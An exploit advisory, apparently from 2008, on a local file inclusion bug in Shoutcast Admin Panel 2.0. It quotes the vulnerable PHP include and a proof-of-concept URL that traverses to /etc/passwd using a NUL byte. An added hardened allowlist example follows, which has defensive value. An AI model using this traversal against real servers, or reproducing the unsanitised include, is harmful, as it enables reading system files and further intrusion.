# Title : Shoutcast Admin Panel 2.0 (page) Local File Inclusion Vulnerability
# Published : 2008-06-14
# Author : CWH Underground
============================================================
Shoutcast Admin Panel 2.0 Local File Inclusion Vulnerability
============================================================
AUTHOR : CWH Underground
DATE : 14 June 2008
SITE : www.citec.us
#####################################################
APPLICATION : WallCity-Server: Shoutcast Admin Panel
VERSION : 2.0
DOWNLOAD : http://downloads.sourceforge.net/shoutcastadmin
#####################################################
---LFI---
-------------------------
Vulnerable in index.php
-------------------------
@Line
79: if (isset($_GET['page']))
80: $page = $_GET['page'];
81: else
82: $page = "main";
.
.
.
204: <?PHP if(!include("pages/".$page.".php"))
205: {
206: table("Achtung!");
207: echo "Die Seite existiert nicht!";
208: closetable();
209: }
210: ?>
-------------
POC Exploit
-------------
[+] http://192.168.24.25/wallcity/index.php?page=../../../../../../etc/passwd%00
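A hardened form of the page handling in index.php, as an added example (not code from the advisory or from the Shoutcast Admin Panel project). resolve_page() is a hypothetical helper that allowlists the page name and confirms the resolved file stays under pages/; the temporary directory and the input list are constructed for the demo.

```php
<?php
// Added example, not code from the advisory or from the WallCity project.
// resolve_page() is a hypothetical helper; the temp directory stands in for pages/.

function resolve_page($page, string $pagesDir): ?string
{
    // $_GET['page'] can be an array (?page[]=x); accept strings only.
    if (!is_string($page)) {
        return null;
    }
    // Allowlist: letters, digits, '_' and '-'. This rejects '/', '\', '.', '%'
    // and NUL bytes. \A...\z is used because '$' would allow a trailing newline.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $page)) {
        return null;
    }
    // Defence in depth: canonicalise and require the file to sit under pages/.
    $base = realpath($pagesDir);
    $path = realpath($pagesDir . DIRECTORY_SEPARATOR . $page . '.php');
    if ($base === false || $path === false) {
        return null; // missing directory or unknown page
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null; // resolved outside pages/ (for example via a symlink)
    }
    return $path;
}

// Constructed demo: a throwaway pages/ directory with a single page in it.
$pages = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'pages_demo_' . getmypid();
mkdir($pages);
file_put_contents($pages . DIRECTORY_SEPARATOR . 'main.php', "<?php echo 'main page';\n");

$inputs = [
    'main',                              // legitimate page
    "../../../../../../etc/passwd\0",    // page value from the POC URL, URL-decoded
    '../../../../../../etc/passwd',      // same path without the NUL byte
    'main.php',                          // dots are not allowed in a page name
    ['main'],                            // array parameter
    'missing',                           // well-formed name, no such page
];
foreach ($inputs as $in) {
    $file = resolve_page($in, $pages);
    printf("%-40s => %s\n", json_encode($in), $file === null ? 'rejected' : 'include ' . $file);
}

unlink($pages . DIRECTORY_SEPARATOR . 'main.php');
rmdir($pages);
```

In index.php the result would replace the direct include: call include on the returned path, and show the existing error box when resolve_page() returns null.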
##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos #
##################################################################